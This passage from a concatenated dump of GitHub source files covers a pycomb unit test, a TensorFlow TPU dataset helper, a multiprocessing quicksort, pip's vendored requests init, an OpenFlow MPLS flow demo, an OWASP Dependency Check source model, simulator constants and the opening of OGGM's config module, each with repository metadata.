"name": "Starlark",
"bytes": "987"
},
{
"name": "Vim Script",
"bytes": "192"
}
],
"symlink_target": ""
} |
import unittest
from pycomb import combinators, context
from pycomb.combinators import dictionary
from pycomb.test import util
class TestDictionary(unittest.TestCase):
def test_ok(self):
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.union(combinators.String, combinators.Int))
sut(d)
def test_values(self):
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.String)
with util.throws_with_message('Error on dictionary(Int: String)[3]: expected String but was int'):
sut(d)
def test_keys(self):
d = {
'hello': 1,
1: 2,
4: 3
}
sut = dictionary(combinators.Int, combinators.Int)
with util.throws_with_message('Error on dictionary(Int: Int).hello: expected Int but was str'):
sut(d)
def test_values_with_name(self):
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.String, name='IntStringDict')
with util.throws_with_message('Error on IntStringDict[3]: expected String but was int'):
sut(d)
def test_keys_with_name(self):
d = {
'hello': 1,
1: 2,
4: 3
}
sut = dictionary(combinators.Int, combinators.Int, name='IntIntDict')
with util.throws_with_message('Error on IntIntDict.hello: expected Int but was str'):
sut(d)
def test_no_dict(self):
d = object()
sut = dictionary(combinators.Int, combinators.Int)
with util.throws_with_message('Error on dictionary(Int: Int): expected dictionary(Int: Int) but was object'):
sut(d)
sut = dictionary(combinators.Int, combinators.Int, name='ADict')
with util.throws_with_message('Error on ADict: expected ADict but was object'):
sut(d)
def test_production_mode(self):
ctx = context.create(production_mode=True)
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.String)
self.assertIs(d, sut(d, ctx=ctx))
d = {
'hello': 1,
1: 2,
4: 3
}
sut = dictionary(combinators.Int, combinators.Int)
self.assertIs(d, sut(d, ctx=ctx))
d = object()
sut = dictionary(combinators.Int, combinators.Int)
self.assertIs(d, sut(d, ctx=ctx))
| {
"content_hash": "e7b12bac9a18ef9df0125e366f68f58f",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 117,
"avg_line_length": 28.793478260869566,
"alnum_prop": 0.5432238580596451,
"repo_name": "fcracker79/pycomb",
"id": "820f89963bb0b0627faea22733573e55e3920aa9",
"size": "2649",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pycomb/test/test_dictionary.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "70771"
},
{
"name": "Shell",
"bytes": "183"
}
],
"symlink_target": ""
} |
"""Library of Cloud TPU helper functions for data loading."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import interleave_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.ops import readers
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import functional_ops
def _TextLineDataset(filename):
buffer_size = 8 * 1024 * 1024 # 8 MiB per file
dataset = readers.TextLineDataset(filename, buffer_size=buffer_size)
return dataset
def _TFRecordDataset(filename):
buffer_size = 8 * 1024 * 1024 # 8 MiB per file
dataset = readers.TFRecordDataset(filename, buffer_size=buffer_size)
return dataset
_FILETYPE_MAP = {
'tfrecord': _TFRecordDataset,
'textline': _TextLineDataset,
'text': _TextLineDataset,
}
def StreamingFilesDataset(files,
filetype=None,
file_reader_job=None,
worker_job=None,
num_epochs=None,
filename_shuffle_buffer_size=None,
num_parallel_reads=None,
batch_transfer_size=None,
sloppy=None):
"""StreamingFilesDataset constructs a dataset to stream from workers (GCE VM).
Because Cloud TPUs are allocated over the network, a Cloud TPU cannot read
files local to your GCE VM. In order to train using files stored on your local
VM (e.g. on local SSD for extreme performance), use the StreamingFilesDataset
helper to generate a dataset to feed your Cloud TPU with files from your GCE
VM.
  The resulting dataset may raise an OutOfRangeError if there are no files
found as a result of the fileglob expansion.
Note: StreamingFilesDataset assumes that the session is using a
  TPUClusterResolver and therefore has a worker and a coordinator job. File
loading will be done on the coordinator job.
Args:
files: A string glob to match files, or a `tf.data.Dataset` generating file
names.
    filetype: A string (one of 'tfrecord', 'textline', or 'text') or a
      single-argument TensorFlow function that, given a filename, returns a
      dataset.
file_reader_job: An optional string that corresponds to the job that should
perform the file reads.
worker_job: An optional string that corresponds to the job that should
process the tensors (i.e. your GPU or TPU worker).
num_epochs: The number of epochs through the training set that should be
generated. By default, it will repeat infinitely.
filename_shuffle_buffer_size: An optional integer whose value controls the
shuffling of the file names. If you would like to read from the files in
the same order, set to 0 or False.
num_parallel_reads: An optional integer controlling the number of files to
read from concurrently. (Set to 1 for no parallelism.)
batch_transfer_size: An optional integer controlling the batching used to
amortize the remote function invocation overhead. Set to a very large
number to increase throughput. Set to a very small number to reduce memory
consumption. Set to False to skip batching.
sloppy: (Optional.) If `False`, read input data while maintaining a
deterministic order. (This may have significant performance impacts.)
sloppy defaults to: True.
Returns:
A `tf.data.Dataset` with an infinite stream of elements generated by a
    parallel interleaving of the set of files matched (or generated) by
    `files`, with an element type determined by the dataset specified by
    `filetype`.
Raises:
ValueError: if any argument is not of the expected type.
"""
if filetype is None:
filetype = 'tfrecord'
if isinstance(filetype, str):
if filetype not in _FILETYPE_MAP:
raise ValueError('Unexpected filetype: %s' % filetype)
reader_fn = _FILETYPE_MAP[filetype]
elif callable(filetype):
reader_fn = filetype
else:
raise ValueError('filetype should be a string or a callable')
file_reader_job = file_reader_job or 'coordinator'
worker_job = worker_job or 'worker'
if filename_shuffle_buffer_size is None:
filename_shuffle_buffer_size = 4096
num_parallel_reads = num_parallel_reads or 8
if batch_transfer_size is None:
batch_transfer_size = 256
if sloppy is None:
sloppy = True
with ops.device('/job:%s' % file_reader_job):
if isinstance(files, str):
source_dataset = dataset_ops.Dataset.list_files(files)
elif isinstance(files, dataset_ops.Dataset):
source_dataset = files
else:
raise ValueError('files was not a string or a dataset: %s' % files)
if filename_shuffle_buffer_size:
source_dataset = source_dataset.shuffle(
buffer_size=filename_shuffle_buffer_size)
# NOTE: We perform the `repeat` on the source dataset, because the output
# dataset does not currently have enough information to recreate an iterator
# over the source dataset when it reaches the end.
source_dataset = source_dataset.repeat(num_epochs)
source_dataset = source_dataset.apply(
interleave_ops.parallel_interleave(
reader_fn, cycle_length=num_parallel_reads, sloppy=sloppy))
if batch_transfer_size:
source_dataset = source_dataset.batch(batch_transfer_size)
source_dataset = source_dataset.prefetch(1)
source_iterator = source_dataset.make_one_shot_iterator()
source_handle = source_iterator.string_handle()
@function.Defun(dtypes.string)
def LoadingFunc(h):
remote_iterator = iterator_ops.Iterator.from_string_handle(
h, source_dataset.output_types, source_dataset.output_shapes)
return remote_iterator.get_next()
def MapFn(unused_input):
if isinstance(source_dataset.output_types, dtypes.DType):
output_types = [source_dataset.output_types]
elif isinstance(source_dataset.output_types, (list, tuple)):
output_types = source_dataset.output_types
else:
raise ValueError('source dataset has invalid output types')
remote_calls = functional_ops.remote_call(
args=[source_handle],
Tout=output_types,
f=LoadingFunc,
target='/job:%s/replica:0/task:0/cpu:0' % file_reader_job)
if len(remote_calls) == 1:
return remote_calls[0]
else:
return remote_calls
with ops.device('/job:%s' % worker_job):
output_dataset = dataset_ops.Dataset.range(2).repeat().map(
MapFn, num_parallel_calls=4 if sloppy else None)
output_dataset = output_dataset.prefetch(1)
if batch_transfer_size:
# Undo the batching used during the transfer.
output_dataset = output_dataset.apply(batching.unbatch()).prefetch(1)
return output_dataset
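# The following is a hedged usage sketch, not part of the original module: it
# assumes a session created with a TPUClusterResolver using the default
# 'coordinator' and 'worker' job names, and a file glob matching TFRecord
# files on the coordinator VM's local disk. Paths and parameter values are
# made up for illustration only.
def _streaming_files_dataset_example():
  dataset = StreamingFilesDataset(
      '/mnt/local-ssd/train-*.tfrecord',
      filetype='tfrecord',
      filename_shuffle_buffer_size=1024,
      num_parallel_reads=8)
  iterator = dataset.make_one_shot_iterator()
  return iterator.get_next()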
| {
"content_hash": "f6f4ffff001ed4d082396ad0a8560323",
"timestamp": "",
"source": "github",
"line_count": 180,
"max_line_length": 80,
"avg_line_length": 39.06666666666667,
"alnum_prop": 0.7060580204778157,
"repo_name": "girving/tensorflow",
"id": "c694e9c1bca10d9930492c29dd1c3cbc7f7f5d04",
"size": "7681",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/tpu/python/tpu/datasets.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3325"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "343258"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50036869"
},
{
"name": "CMake",
"bytes": "196127"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1254086"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "867313"
},
{
"name": "Jupyter Notebook",
"bytes": "2604735"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "58787"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "42041620"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "477299"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
import multiprocessing
import random
workId = 0
class Work:
def __init__(self, part, startIndex, debug=False, depth=0):
global workId
self.startIndex = startIndex
self.part = part
self.pivot = None
self.works = []
# for debugging only
self.debug = debug
self.depth = depth
self.prefix = " " * self.depth
def startPartitioning(self):
if self.debug:
print("{}{}: start partitioning list: {}".format(self.prefix, multiprocessing.current_process().name, self.part))
pivot = self.part[0]
lessPart = []
morePart = []
for x in self.part:
if x < pivot:
lessPart.append(x)
elif x > pivot:
morePart.append(x)
else:
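                # Values equal to the pivot are neither kept nor recursed on,
                # so duplicates of the pivot would be silently dropped; the
                # demo input (random.sample) never contains duplicates.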
pass
if len(lessPart) > 0:
w = Work(lessPart, self.startIndex, debug=self.debug, depth=self.depth + 1)
self.works.append(w)
if len(morePart) > 0:
w = Work(morePart, self.startIndex + len(lessPart) + 1, debug=self.debug, depth=self.depth + 1)
self.works.append(w)
self.pivot = (pivot, self.startIndex + len(lessPart))
def __str__(self):
s = "{}startIndex {} pivot {} works [".format(self.prefix, self.startIndex, self.pivot)
for w in self.works:
assert isinstance(w, Work)
s += "{"
s += "startIndex {} part {}".format(w.startIndex, w.part)
s += "}"
if w is not self.works[-1]:
s += ", "
s += "]"
return s
def f(w):
assert isinstance(w, Work)
w.startPartitioning()
return w
def qsort(items, debug=False):
pool = multiprocessing.Pool(multiprocessing.cpu_count())
w = Work(items, 0, debug=debug)
pendingWorks = [w]
result = [-1] * len(items)
while len(pendingWorks) > 0:
worksDone = pool.map(f, pendingWorks, chunksize=5)
pendingWorks.clear()
for w in worksDone:
assert isinstance(w, Work)
if debug:
print(w)
value, index = w.pivot
result[index] = value
            # Alternatively, we could optimize away trivial works that contain a single item.
pendingWorks.extend(w.works)
return result
sample = random.sample(range(100), 10)
print("->", sample)
print("sorted list:", qsort(sample, debug=True))
| {
"content_hash": "7ce9e2d2705d8659e037c1efbcf0ae59",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 125,
"avg_line_length": 27.054945054945055,
"alnum_prop": 0.5446791226645004,
"repo_name": "bennyk/MyPythonEssentialsClass-2015",
"id": "0479bcae3a9c0298ca01be28648af858daadcecb",
"size": "2463",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "samples/quicksort/pool-main.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
Requests HTTP Library
~~~~~~~~~~~~~~~~~~~~~
Requests is an HTTP library, written in Python, for human beings. Basic GET
usage:
>>> import requests
>>> r = requests.get('https://www.python.org')
>>> r.status_code
200
>>> 'Python is a programming language' in r.content
True
... or POST:
>>> payload = dict(key1='value1', key2='value2')
>>> r = requests.post('http://httpbin.org/post', data=payload)
>>> print(r.text)
{
...
"form": {
"key2": "value2",
"key1": "value1"
},
...
}
The other HTTP methods are supported - see `requests.api`. Full documentation
is at <http://python-requests.org>.
:copyright: (c) 2017 by Kenneth Reitz.
:license: Apache 2.0, see LICENSE for more details.
"""
from pip._vendor import urllib3
from pip._vendor import chardet
import warnings
from .exceptions import RequestsDependencyWarning
def check_compatibility(urllib3_version, chardet_version):
urllib3_version = urllib3_version.split('.')
assert urllib3_version != ['dev'] # Verify urllib3 isn't installed from git.
# Sometimes, urllib3 only reports its version as 16.1.
if len(urllib3_version) == 2:
urllib3_version.append('0')
# Check urllib3 for compatibility.
major, minor, patch = urllib3_version # noqa: F811
major, minor, patch = int(major), int(minor), int(patch)
# urllib3 >= 1.21.1, <= 1.23
assert major == 1
assert minor >= 21
assert minor <= 23
# Check chardet for compatibility.
major, minor, patch = chardet_version.split('.')[:3]
major, minor, patch = int(major), int(minor), int(patch)
# chardet >= 3.0.2, < 3.1.0
assert major == 3
assert minor < 1
assert patch >= 2
def _check_cryptography(cryptography_version):
# cryptography < 1.3.4
try:
cryptography_version = list(map(int, cryptography_version.split('.')))
except ValueError:
return
if cryptography_version < [1, 3, 4]:
warning = 'Old version of cryptography ({0}) may cause slowdown.'.format(cryptography_version)
warnings.warn(warning, RequestsDependencyWarning)
# Check imported dependencies for compatibility.
try:
check_compatibility(urllib3.__version__, chardet.__version__)
except (AssertionError, ValueError):
warnings.warn("urllib3 ({0}) or chardet ({1}) doesn't match a supported "
"version!".format(urllib3.__version__, chardet.__version__),
RequestsDependencyWarning)
# Attempt to enable urllib3's SNI support, if possible
from pip._internal.compat import WINDOWS
if not WINDOWS:
try:
from pip._vendor.urllib3.contrib import pyopenssl
pyopenssl.inject_into_urllib3()
# Check cryptography version
from cryptography import __version__ as cryptography_version
_check_cryptography(cryptography_version)
except ImportError:
pass
# urllib3's DependencyWarnings should be silenced.
from pip._vendor.urllib3.exceptions import DependencyWarning
warnings.simplefilter('ignore', DependencyWarning)
from .__version__ import __title__, __description__, __url__, __version__
from .__version__ import __build__, __author__, __author_email__, __license__
from .__version__ import __copyright__, __cake__
from . import utils
from . import packages
from .models import Request, Response, PreparedRequest
from .api import request, get, head, post, patch, put, delete, options
from .sessions import session, Session
from .status_codes import codes
from .exceptions import (
RequestException, Timeout, URLRequired,
TooManyRedirects, HTTPError, ConnectionError,
FileModeWarning, ConnectTimeout, ReadTimeout
)
# Set default logging handler to avoid "No handler found" warnings.
import logging
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
# FileModeWarnings go off per the default.
warnings.simplefilter('default', FileModeWarning, append=True)
| {
"content_hash": "9870979f925c50647af18e7d3944647f",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 102,
"avg_line_length": 31.267175572519083,
"alnum_prop": 0.67626953125,
"repo_name": "stopstalk/stopstalk-deployment",
"id": "9fb6633ed8bd620e47d1dbef5e23f09c80e6a24f",
"size": "4203",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "aws_lambda/spoj_aws_lambda_function/lambda_code/pip/_vendor/requests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "CSS",
"bytes": "83271"
},
{
"name": "Cython",
"bytes": "123663"
},
{
"name": "HTML",
"bytes": "190175"
},
{
"name": "JavaScript",
"bytes": "681456"
},
{
"name": "Less",
"bytes": "78481"
},
{
"name": "Makefile",
"bytes": "98"
},
{
"name": "Python",
"bytes": "7648306"
},
{
"name": "SCSS",
"bytes": "79489"
},
{
"name": "Shell",
"bytes": "6187"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
} |
import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.pco2w_abc.imodem.pco2w_abc_imodem_recovered_driver import parse
from mi.dataset.driver.pco2w_abc.imodem.resource import RESOURCE_PATH
__author__ = 'mworden'
log = get_logger()
class DriverTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'pco2wXYZ_11212014_1624.DAT')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
        self.assertEqual(particle_data_handler._failure, False)
if __name__ == '__main__':
test = DriverTest('test_one')
test.test_one()
| {
"content_hash": "59e39cb9348acb44a3b159cfe2ac0459",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 86,
"avg_line_length": 28.741935483870968,
"alnum_prop": 0.7115600448933782,
"repo_name": "oceanobservatories/mi-instrument",
"id": "8fc4d6333d36d14b66d7171337f485d41d67a11e",
"size": "891",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "mi/dataset/driver/pco2w_abc/imodem/test/test_pco2w_abc_imodem_recovered_driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "4746"
},
{
"name": "Python",
"bytes": "10221924"
}
],
"symlink_target": ""
} |
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
"""
import time
from pybvc.controller.controller import Controller
from pybvc.openflowdev.ofswitch import (OFSwitch,
FlowEntry,
Match,
Instruction,
SetMplsTTLAction,
DecMplsTTLAction,
OutputAction)
from pybvc.common.utils import load_dict_from_file
from pybvc.common.status import STATUS
from pybvc.common.constants import ETH_TYPE_MPLS_UCAST
def delete_flows(ofswitch, table_id, flow_ids):
for flow_id in flow_ids:
result = ofswitch.delete_flow(table_id, flow_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow with id of '%s' successfully removed "
"from the Controller" % flow_id)
else:
print ("!!!Flow '%s' removal error, reason: %s" %
(flow_id, status.brief()))
def of_demo_42():
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit(0)
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo 42 Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
ofswitch = OFSwitch(ctrl, nodeName)
print ("<<< 'Controller': %s, 'OpenFlow' switch: '%s'" %
(ctrlIpAddr, nodeName))
first_flow_id = 110
# ---------------------------------------------------
# First flow entry
# ---------------------------------------------------
table_id = 0
flow_id = first_flow_id
flow_name = "Modify MPLS TTL example1"
priority = 900
cookie = 1300
match_in_port = 3
match_eth_type = ETH_TYPE_MPLS_UCAST
match_mpls_label = 567
act_mod_mpls_ttl = 2
act_out_port = 112
    print ("\n")
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" MPLS Label (%s)" %
(match_in_port,
hex(match_eth_type),
match_mpls_label))
print (" Actions: Set MPLS TTL (%s)\n"
" Output (%s)" %
(act_mod_mpls_ttl, act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry1 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry1.set_flow_table_id(table_id)
flow_entry1.set_flow_name(flow_name)
flow_entry1.set_flow_id(flow_id)
flow_entry1.set_flow_cookie(cookie)
flow_entry1.set_flow_priority(priority)
flow_entry1.set_flow_hard_timeout(0)
flow_entry1.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = SetMplsTTLAction(action_order)
action.set_ttl(act_mod_mpls_ttl)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry1.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_mpls_label(match_mpls_label)
flow_entry1.add_match(match)
print ("\n")
print ("<<< Flow to send:")
    print (flow_entry1.get_payload())
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry1)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
# ---------------------------------------------------
# Second flow entry
# ---------------------------------------------------
table_id = 0
flow_id += 1
flow_name = "Modify MPLS TTL example2"
priority = 900
cookie = 1300
match_in_port = 112
match_eth_type = ETH_TYPE_MPLS_UCAST
match_mpls_label = 567
act_out_port = 3
    print ("\n")
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" MPLS Label (%s)" %
(match_in_port,
hex(match_eth_type),
match_mpls_label))
print (" Actions: Decrement MPLS TTL\n"
" Output (%s)" %
(act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry2 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry2.set_flow_table_id(table_id)
flow_entry2.set_flow_name(flow_name)
flow_entry2.set_flow_id(flow_id)
flow_entry2.set_flow_cookie(cookie)
flow_entry2.set_flow_priority(priority)
flow_entry2.set_flow_hard_timeout(0)
flow_entry2.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = DecMplsTTLAction(action_order)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry2.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_mpls_label(match_mpls_label)
flow_entry2.add_match(match)
print ("\n")
print ("<<< Flow to send:")
    print (flow_entry2.get_payload())
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry2)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
print ("\n")
print ("<<< Delete flows from the Controller's cache "
"and from the table '%s' on the '%s' node" % (table_id, nodeName))
time.sleep(rundelay)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
print ("\n")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
of_demo_42()
| {
"content_hash": "f485fa150a827b8cbb138651e3c37322",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 77,
"avg_line_length": 30.546610169491526,
"alnum_prop": 0.5436260230267721,
"repo_name": "tnadeau/pybvc",
"id": "87a6dc80974ae7581529d86cc3e7eaf41fbf08d7",
"size": "8783",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "samples/sampleopenflow/demos/demo42.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Perl",
"bytes": "2452"
},
{
"name": "Python",
"bytes": "436853"
}
],
"symlink_target": ""
} |
"""OWASP Dependency Check source."""
from ..meta.entity import Color, EntityAttributeType
from ..meta.source import Source
from ..parameters import access_parameters, MultipleChoiceWithAdditionParameter, Severities
ALL_OWASP_DEPENDENCY_CHECK_METRICS = [
"dependencies",
"security_warnings",
"source_up_to_dateness",
"source_version",
]
DEPENDENCY_ATTRIBUTES: list[object] = [
dict(name="File path", url="url"),
dict(name="File path after applying regular expressions", key="file_path_after_regexp"),
dict(name="File name"),
]
SECURITY_WARNING_ATTRIBUTES = [
dict(name="Highest severity", color=dict(Critical=Color.NEGATIVE, High=Color.NEGATIVE, Medium=Color.WARNING)),
dict(name="Number of vulnerabilities", key="nr_vulnerabilities", type=EntityAttributeType.INTEGER),
]
OWASP_DEPENDENCY_CHECK = Source(
name="OWASP Dependency Check",
description="Dependency-Check is a utility that identifies project dependencies and checks if there are any known, "
"publicly disclosed, vulnerabilities.",
url="https://owasp.org/www-project-dependency-check/",
parameters=dict(
severities=Severities(values=["low", "moderate", "medium", "high", "critical"]),
variable_file_path_regexp=MultipleChoiceWithAdditionParameter(
name="Parts of file paths to ignore (regular expressions)",
short_name="parts of file paths to ignore",
help="Parts of file paths to ignore can be specified by regular expression. The parts of file paths that "
"match one or more of the regular expressions are removed. If, after applying the regular expressions, "
"multiple warnings are the same only one is reported.",
metrics=["dependencies", "security_warnings"],
),
**access_parameters(
ALL_OWASP_DEPENDENCY_CHECK_METRICS, source_type="an OWASP Dependency Check report", source_type_format="XML"
)
),
entities=dict(
security_warnings=dict(name="security warning", attributes=DEPENDENCY_ATTRIBUTES + SECURITY_WARNING_ATTRIBUTES),
dependencies=dict(name="dependency", name_plural="dependencies", attributes=DEPENDENCY_ATTRIBUTES),
),
)
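# Hedged illustration, not part of the data model above: a minimal sketch of
# the behavior that the 'variable_file_path_regexp' parameter describes. The
# helper name below is hypothetical; the collector that actually consumes this
# parameter lives elsewhere.
def _strip_variable_path_parts_example(file_path, regexps):
    """Remove every part of the path that matches one of the expressions."""
    import re
    for regexp in regexps:
        file_path = re.sub(regexp, "", file_path)
    return file_path
# With regexps=[r"/build-\d+"], both '/ci/build-123/lib/foo.jar' and
# '/ci/build-456/lib/foo.jar' collapse to '/ci/lib/foo.jar', so identical
# warnings are reported only once.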
| {
"content_hash": "69abcff4de3e1be50fdae2b85f8b4e7a",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 120,
"avg_line_length": 46.0625,
"alnum_prop": 0.7042062415196744,
"repo_name": "ICTU/quality-time",
"id": "1eb184760318c8b3ace63cd4fbb842e8d3b61ca1",
"size": "2211",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "components/shared_data_model/src/shared_data_model/sources/owasp_dependency_check.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "11325"
},
{
"name": "Dockerfile",
"bytes": "7493"
},
{
"name": "Gherkin",
"bytes": "48447"
},
{
"name": "HTML",
"bytes": "1575"
},
{
"name": "JavaScript",
"bytes": "547159"
},
{
"name": "Python",
"bytes": "1386198"
},
{
"name": "Shell",
"bytes": "19321"
}
],
"symlink_target": ""
} |
"""
The huginn.constants module contains the constant values used by the simulator
"""
# speed of sound at sea level (knots)
a0 = 661.4788
# standard sea level temperature (Kelvin)
T0 = 288.15
# pressure at sea level (Pascal)
p0 = 101325.0
# standard gravitational acceleration (m/s^2)
g = 9.80665
# molar mass of air (g/mol)
M = 28.97
# universal gas constant (J/(kmol*K))
R = 8314.4598
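# Hedged addition, not part of the original module: combining the constants
# above via the ideal gas law (rho = p * M / (R * T), with M in g/mol and R in
# J/(kmol*K)) gives the standard sea-level air density of about 1.225 kg/m^3.
rho0 = (p0 * M) / (R * T0)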
| {
"content_hash": "40bb63133dd3b1be4494f2750041be13",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 78,
"avg_line_length": 15.590909090909092,
"alnum_prop": 0.6997084548104956,
"repo_name": "pmatigakis/Huginn",
"id": "516b89c11e711f54008da5ce80ae731a12011798",
"size": "343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "huginn/constants.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "10626"
},
{
"name": "GLSL",
"bytes": "1896"
},
{
"name": "HTML",
"bytes": "8336"
},
{
"name": "JavaScript",
"bytes": "16353"
},
{
"name": "Protocol Buffer",
"bytes": "4078"
},
{
"name": "Python",
"bytes": "266838"
},
{
"name": "RobotFramework",
"bytes": "59243"
},
{
"name": "Shell",
"bytes": "521"
}
],
"symlink_target": ""
} |
""" Configuration file and options
A number of globals are defined here to be available everywhere.
"""
import logging
import os
import shutil
import sys
import glob
from collections import OrderedDict
from distutils.util import strtobool
import warnings
import numpy as np
import pandas as pd
try:
from scipy.signal.windows import gaussian
except ImportError:
# Old scipy
from scipy.signal import gaussian
from configobj import ConfigObj, ConfigObjError
try:
import geopandas as gpd
except ImportError:
pass
try:
import salem
except ImportError:
pass
from oggm.exceptions import InvalidParamsError
# Local logger
log = logging.getLogger(__name__)
# Path to the cache directory
CACHE_DIR = os.path.join(os.path.expanduser('~'), '.oggm')
if not os.path.exists(CACHE_DIR):
os.makedirs(CACHE_DIR)
# Path to the config file
CONFIG_FILE = os.path.join(os.path.expanduser('~'), '.oggm_config')
# config was changed, indicates that multiprocessing needs a reset
CONFIG_MODIFIED = False
# Share state across processes
DL_VERIFIED = dict()
DEM_SOURCE_TABLE = dict()
DATA = dict()
# Machine epsilon
FLOAT_EPS = np.finfo(float).eps
class DocumentedDict(dict):
"""Quick "magic" to document the BASENAMES entries."""
def __init__(self):
self._doc = dict()
def _set_key(self, key, value, docstr=''):
if key in self:
